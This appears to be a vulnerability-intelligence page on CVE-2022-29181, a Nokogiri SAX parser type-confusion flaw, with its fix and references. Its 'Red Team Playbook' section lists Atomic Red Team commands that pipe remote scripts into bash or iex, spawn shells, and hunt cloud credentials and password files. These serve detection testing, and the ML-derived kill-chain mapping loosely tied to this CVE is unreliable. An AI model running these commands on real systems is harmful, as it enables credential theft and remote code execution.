CVE-2022-29181
Overview
This vulnerability is a type confusion flaw in the Nokogiri XML and HTML4 SAX parsers where inputs are not properly type-checked before processing. The root cause lies in the parsers accepting untrusted inputs without verifying they are of the expected String type, leading to illegal memory accesses. The affected component is the Nokogiri SAX parser implementation in versions prior to 1.13.6, which fails to enforce strict input type validation.
Vulnerability Description
Nokogiri is an open source XML and HTML library for Ruby. Nokogiri prior to version 1.13.6 does not type-check all inputs into the XML and HTML4 SAX parsers, allowing specially crafted untrusted inputs to cause illegal memory access errors (segfault) or reads from unrelated memory. Version 1.13.6 contains a patch for this issue. As a workaround, ensure the untrusted input is a `String` by calling `#to_s` or equivalent.
Impact
An attacker can exploit this vulnerability by supplying crafted inputs to the Nokogiri SAX parsers, causing the application to crash or potentially leak memory contents. No authentication or user interaction is required, as the attack vector is remote and network accessible (AV:N/AC:L/PR:N/UI:N). This can result in denial of service through application crashes or unauthorized disclosure of sensitive memory data, impacting availability and confidentiality of services utilizing Nokogiri parsing.
Solution
Upgrade Nokogiri to version 1.13.6 or later, which includes a patch enforcing strict input type checking in the SAX parsers. Refer to the official GitHub security advisory GHSA-xh29-r2w5-wx8m for detailed patch information and commit references (83cc451c3f29df397caa890afc3b714eae6ab8f7, db05ba9a1bd4b90aa6c76742cf6102a7c7297267). As a temporary workaround, ensure all untrusted inputs are explicitly converted to String objects using `#to_s` before parsing.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Nokogiri library, an essential tool for parsing XML and HTML in Ruby applications, stems from inadequate type-checking of inputs within its SAX parsers. This oversight allows attackers to supply specially crafted untrusted inputs, which can lead to illegal memory access errors, such as segmentation faults, or even unauthorized reads from unrelated memory segments. The absence of stringent input validation mechanisms means that the library fails to properly handle unexpected data types, creating a pathway for potential exploitation. The issue is particularly critical given the widespread use of Nokogiri in various Ruby applications, making it a prominent target for malicious actors.
Attack vectors exploiting this vulnerability can manifest in several ways. An attacker could craft a malicious payload designed to be processed by an application utilizing the affected version of Nokogiri. By injecting this payload, the attacker could trigger a segmentation fault, causing the application to crash. In more severe scenarios, the attacker might manipulate the memory to read sensitive information from the application's memory space, which could include user credentials, API keys, or other confidential data. This exploitation could occur through various channels, such as web applications that accept user-uploaded XML or HTML files, or through APIs that process untrusted data. The potential for exploitation underscores the need for developers to be vigilant in their input handling practices.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Nokogiri for processing user-generated content or external data. A successful exploitation could lead to application downtime, data breaches, and the potential loss of customer trust. The business risks associated with such incidents are manifold, including financial losses from remediation efforts, legal liabilities stemming from data protection regulations, and reputational damage that can have long-lasting effects on customer relationships. Additionally, organizations may face increased scrutiny from stakeholders and regulatory bodies, further complicating recovery efforts.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize updating to the patched version of Nokogiri, specifically version 1.13.6 or later. Regularly monitoring dependencies for vulnerabilities is crucial, and employing automated tools to scan for outdated libraries can streamline this process. In addition to updating, developers should implement robust input validation mechanisms to ensure that all data processed by the application is sanitized and conforms to expected types. For instance, explicitly converting untrusted inputs to a string format using methods like `#to_s` can help mitigate the risk of exploitation. Furthermore, employing security best practices such as code reviews and static analysis can enhance the overall security posture of applications utilizing Nokogiri.
In conclusion, the vulnerability within the Nokogiri library highlights the critical importance of input validation in software development. As applications increasingly rely on third-party libraries for functionality, the potential for vulnerabilities to be introduced through these dependencies grows. Organizations must remain proactive in their security efforts, ensuring that they not only keep their software up to date but also adopt comprehensive strategies for input handling and vulnerability management. By doing so, they can significantly reduce their exposure to risks associated with such vulnerabilities and maintain the integrity and security of their applications.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nokogiri | Nokogiri | All |
cpe:2.3:a:nokogiri:nokogiri:*:*:*:*:*:ruby:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-29181 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xh29-r2w5-wx8m |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/sparklemotion/nokogiri/commit/83cc451c3f29df397caa890afc3b714eae6ab8f7 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/sparklemotion/nokogiri/commit/db05ba9a1bd4b90aa6c76742cf6102a7c7297267 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.6 |
| securitylab.github.com |
GitHub CVE
x_refsource_MISC
|
https://securitylab.github.com/advisories/GHSL-2022-031_GHSL-2022-032_Nokogiri |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2022/Dec/23 |
| security.gentoo.org |
NVD API
Third Party Advisory
|
https://security.gentoo.org/glsa/202208-29 |
| support.apple.com |
NVD API
Third Party Advisory
|
https://support.apple.com/kb/HT213532 |